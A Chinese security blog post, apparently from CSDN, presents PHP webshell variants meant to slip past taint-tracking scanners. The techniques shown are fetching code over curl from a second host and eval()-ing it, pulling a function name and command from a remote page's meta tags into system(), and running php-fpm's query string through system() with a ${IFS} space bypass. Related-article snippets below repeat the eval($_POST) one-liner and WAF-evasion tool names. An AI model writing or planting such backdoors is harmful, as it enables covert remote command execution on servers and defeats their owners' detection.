bypass webshell 1

最新推荐文章于 2025-12-05 11:06:37 发布
原创 最新推荐文章于 2025-12-05 11:06:37 发布 · 291 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

客户端请求:192.168.37.136/bypass的网站目录

服务器接收:192.168.37.132的nginx网站目录

1 curl请求外部数据

不是get post cookie传参,污点未启动

<?php
$url="http://192.168.37.132/demo1.txt";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_HTTPHEADER,$headerArray);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
eval($output);

通过url请求外部数据,绕过污点追踪

测试结果:

2 get_meta_tags 引入参数

get_meta_tags 函数会对给定 url 的 meta 标签进行解析,自然也会发起 URL 请求。对
于能够发起外连的服务器来说,这个 PHP WebShell 样本是极具迷惑性的。
不过,之前 CURL 的被忽略了,这个我也就没有再提交。
此时,目标服务器上需要有相应的文件配合:
get_meta_tags:能提取对应name的content里面的内容
<?php
get_meta_tags("http://192.168.37.132/demo2.txt")["author"](get_meta_tags("http://192.168.37.132/demo2.txt")["keywords"]);
?>

所以我的服务器的payload

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <meta name="author" content="system">
      <meta name="keywords" content="ls">
    <title>Document</title>
</head>
<body>
</body>
</html>
<meta name="author" content="system">
<meta name="keywords" content="ls">
通过动态修改该文件第二行的内容,可以给 system 传入不同的参数,参数内容是完全
可控的。

3 fpm_get_status

<?php
echo '<pre>';
var_dump(fpm_get_status());
system(fpm_get_status()["procs"][0]["query-string"]);
?>

这个函数是php-fpm请求的函数,这个数组里面有一个参数是query-string,相当于这里直接是给参数的这个值get传参,如果想写值,用echo写入的话,因为空格是%20当他传入Linux的时候不会解析,但是我们知道Linux里面的空格是{$IFS},但是直接在url栏写也不对,所以我们通过抓包的形式:成功写入(绕过空格)

空格限制

利用query_srting传入需要的命令,特别注意空格的影响,Linux下面可以利用${IFS}来替代空格

${IFS}$(1-9都可以)

综上:

污点追踪,他基于效率不会追踪所有的函数,像前三个webshell一般不会被杀,但是像我们的回调后门,call_user_func一定会被杀

一些Webshell-Bypass的思路
2301_80127209的博客
05-11 895
—经过这一段时间的研究,针对webshell-Bypass我也有了一些自己的技巧,于是决定写下这篇文章,阅读前提是需要有一点PHP的语言基础。在讲解代码之前,需要简单了解一下不同查杀平台webshell查杀的查杀原理。对于一些较传统的Webshell查杀软件大多都是基于特征码进行查杀(正则表达式匹配关键字)。一些在线的Webshell查杀引擎则是在原有的基础上进行了技术革新,例如沙箱模拟运行,污点追踪,人工智能,机器学习等技术。以下称这两种类别的查杀平台为传统类和新兴类。
利用异或、取反、自增bypass_webshell_waf
qq_68163788的博客
12-01 2810
可以使用异或操作来绕过WebShell WAF(Web应用程序防火墙)。,可以使用异或操作来对WebShell进行加密,使其在传输过程中不被WAF检测到。另外,还可以利用取反操作或自增操作来对WebShell进行变换,以避免WAF的检测。需要注意的是,绕过WAF是违法行为,请遵守当地法律法规。
bypass webshell--Trait
fatsheep8_5的博客
08-19 817
源码这个代码他将a-》get到的值传递给了c,然后get_declared_tarits这个函数他是获取trait这个的所有定义的东西,get_declared_traits — 返回所有已定义的 traits 的数组():getmygid()i。
bypasswebshell动态免杀工具
潇湘信安的博客
05-09 538
webshell动态免杀工具由作者花了两天时间用php语言开发的带ui的免杀工具,使用者可上传由冰蝎或者天蝎生成的webshell,动态自动生成免杀webshell
Webshell Bypass
Grey的博客
07-30 913
如何优雅隐藏你的Webshell 1. 优雅的Bypass一句话 2. 优雅的Bypass大马 3. 优雅的隐藏你的Webshell 4. 对于自己的bypass心得以及总结 Bypass思路 1.代码拼接 2.函数回调       1.Bypass一句话 普通的一句话: &lt;?php eval($_POST['x']); ?&gt; //一句话 使用命令执行...
webshell bypass 外加提权
Devotedakura的博客
08-19 426
对于这个情况,我们现在只知道仅许传PHP文件。直接试试传一句话木马,结果不出意料的失败了,又试了几个木马的变形,发现都无济于事,像无头苍蝇一样乱撞。只传入phpinfo()看看有什么收获发现一大堆,基本上所有的恶意函数全部都被过滤,接下来试试用的办法读取Linux 系统中的 /etc/passwd 文件,是系统用户配置文件,存储了系统中所有用户的基本信息,并且所有用户都可以对此文件执行读操作。这里我们用最常用的来读取文件成功读取。那么根据,可以尝试读取网站源码(这里尝试index.php。
PHP webshell bypass
qq_37561898的博客
12-29 756
php webshell bypass
Bypass-JSPWebshell自动生成工具
G0mini的博客
08-07 1231
Bypass-JSPWebshell自动生成工具
php bypass shell,PHP-WebShell-Bypass-WAF
weixin_39587407的博客
04-10 187
PHP-WebShell-Bypass-WAFPHP WebShell 一句话的结构是:输入和执行,这是经典的PHP 一句话代码:WebShell 的输入点在$_GET和$_POST,执行点在eval(),经典的一句话WAF 都会拦截测试:测试:测试:综合上面三点,可以发现WAF 是通过关键字来拦截的,把这三个测试用例放到安全狗下测试可以发现,安全狗是通过综合判断来识别WebShell 的,...
冰蝎WebShell免杀生成
Fly_鹏程万里
06-02 979
ByPassBehinder / 冰蝎WebShell免杀生成文件:ByPassBehinder.exe。
new.bypass_bypass_NEW_免杀_webshell_phpwebshell_
10-03
【标题】"new.bypass_bypass_NEW_免杀_webshell_phpwebshell_" 指的是一种新型的Webshell,它带有“bypass”和“NEW”特性,表明这是一个旨在绕过安全检测,且是最新技术的PHP WebshellWebshell通常被黑客用于远程...
webshell-detect-bypass-master.zip
12-08
文件在 kali linux下安装运行文件在 kali l
网络安全防护指南:筑牢网络安全防线(510)
2509_94105975的博客
12-01 759
网络是指由计算机或者其他信息终端及相关设备组成的按照一定的规则和程序对信息收集、存储、传输、交换、处理的系统。在当今数字化时代,网络已经成为人们生活和工作中不可或缺的一部分。它连接了世界各地的人们,使得信息的传递和交流变得更加便捷高效。
想入门网络安全?CSB网安基地学习体验深度解析
白帽子凯哥哥的博客
12-02 338
想入门网络安全?CSB网安基地学习体验深度解析
网络安全(黑客技术)—2025自学手册
2401_84760527的博客
11-24 1665
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全系列:系统后门与持久化技术深度解析
PyHaVolask的博客
12-03 1313
本文系统阐述渗透测试中维持访问权限的核心技术,详细解析服务绑定、注册表自启动等持久化机制,涵盖Certutil/Bitsadmin远程下载、Meterpreter进程迁移与痕迹清理等高级操作,并提供完整的防御检测与应急响应方案,强调技术沉淀与合法授权的重要性。
中科大计算机网络——网络安全
Tandy12356_的博客
12-01 351
使用checksum作为H不合适,因为很容易反向计算出m'与m有同样的报文摘要。为何不能让你逆向推导出报文m?防止你用不合法的协议m'在法庭上要挟签名人。使用公开密钥加密体系作认证的缺陷:中间人攻击。本质原因:Bob没有拿到真正Alice的公钥。解决方案:让Bob可靠地拿到Alice的公钥。只要根是可靠的,后面大概率也是可靠的。求幂次方和求模运算代价非常大。
ManageEngine 卓豪荣登 KuppingerCole 2025 年《身份威胁检测与响应领导力指南》,获评市场领导者
最新发布
运维有小邓
12-05 660
【摘要】身份威胁检测与响应(ITDR)正成为企业安全防护的关键环节。ManageEngine凭借AD360、PAM360和Log360组成的集成解决方案,在KuppingerCole最新报告中获评ITDR领域领导者。该方案通过统一平台实现身份治理、特权访问管控和威胁检测的闭环管理,特别适用于合规要求严格的行业。AD360提供身份风险可视化与自动化治理,PAM360实现特权账户保护,Log360完成威胁检测与响应闭环,三者协同构建了覆盖混合环境的完整ITDR能力,帮助企业应对日益复杂的身份安全挑战。
网络安全中级阶段学习笔记(二):网络安全暴力破解学习重点笔记
2501_91976946的博客
12-03 1005
本文系统梳理了网络安全中暴力破解攻击的学习要点,主要内容包括:1)暴力破解的基础概念、产生原因及工作原理;2)攻击分类与准备工作,重点介绍常用字典类型;3)BurpSuite工具详解,涵盖Intruder模块的4种攻击模式及关键配置;4)Pikachu靶场实战案例,演示前端/后端验证码绕过及Token防护;5)防御措施和BurpSuite其他功能模块。笔记采用流程图、表格等形式归纳核心知识点,强调"知攻知防"的学习理念,为暴力破解技术的学习与应用提供系统指导。
深入解析NEW免杀Webshell技术与PHP实现
资源摘要信息:"new.bypass_bypass_NEW_免杀_webshell_phpwebshell" 标题中提到的“new.bypass_bypass_NEW_免杀_webshell_phpwebshell”指的是一种具有免杀特性的PHP类型的webshellwebshell是一种可以通过Web界面...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

fatsheep洋

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值